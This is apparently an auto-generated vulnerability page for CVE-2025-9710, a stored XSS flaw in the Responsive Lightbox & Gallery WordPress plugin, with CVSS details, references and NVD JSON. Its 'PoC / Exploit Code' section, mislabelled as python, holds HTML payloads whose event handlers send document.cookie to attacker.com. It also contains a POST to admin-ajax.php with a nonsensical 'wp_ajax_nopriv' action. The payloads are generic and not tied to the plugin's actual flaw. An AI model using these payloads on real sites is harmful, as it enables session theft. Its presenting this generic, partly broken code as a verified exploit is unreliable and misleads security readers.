CVE-2025-9710

Description

The Responsive Lightbox & Gallery WordPress plugin before 2.5.3 does not properly handle HTML tag attributes modifications, potentially allowing unauthenticated attackers to abuse the functionality to include event handlers and conduct Stored XSS attacks.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WordPress Responsive Lightbox & Gallery < 2.5.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC for CVE-2025-9710: Stored XSS via HTML attribute manipulation -->
<!-- The vulnerability exists in HTML tag attribute modification functionality -->

<!-- Example of malicious HTML attribute injection -->
<img src="valid-image.jpg" onerror="alert(document.cookie); fetch('https://attacker.com/steal?c='+document.cookie)">

<!-- Alternative payload using different event handlers -->
<div onmouseover="var i=new Image(); i.src='https://attacker.com/log?data='+document.cookie;">Hover me</div>

<!-- Payload targeting WordPress admin context -->
<a href="#" onclick="var x=new XMLHttpRequest(); x.open('POST','/wp-admin/admin-ajax.php',true); x.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); x.send('action=wp_ajax_nopriv&data='+document.cookie);">Click here</a>

<!-- Exploit flow:
     1. Attacker submits content via the plugin's attribute modification feature
     2. Malicious event handlers are stored in the database without sanitization
     3. When victim views the page, the JavaScript executes in their browser context
     4. Attacker captures sensitive data such as session cookies
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-9710
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-9710
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-9710/
[4] VulDB https://vuldb.com/cve/CVE-2025-9710
[5] https://wpscan.com/vulnerability/a45c74b7-b174-479f-9681-464601b082df/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-9710", "sourceIdentifier": "[email protected]", "published": "2025-10-06T06:15:37.467", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Responsive Lightbox & Gallery WordPress plugin before 2.5.3 does not properly handle HTML tag attributes modifications, potentially allowing unauthenticated attackers to abuse the functionality to include event handlers and conduct Stored XSS attacks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "references": [{"url": "https://wpscan.com/vulnerability/a45c74b7-b174-479f-9681-464601b082df/", "source": "[email protected]"}]}}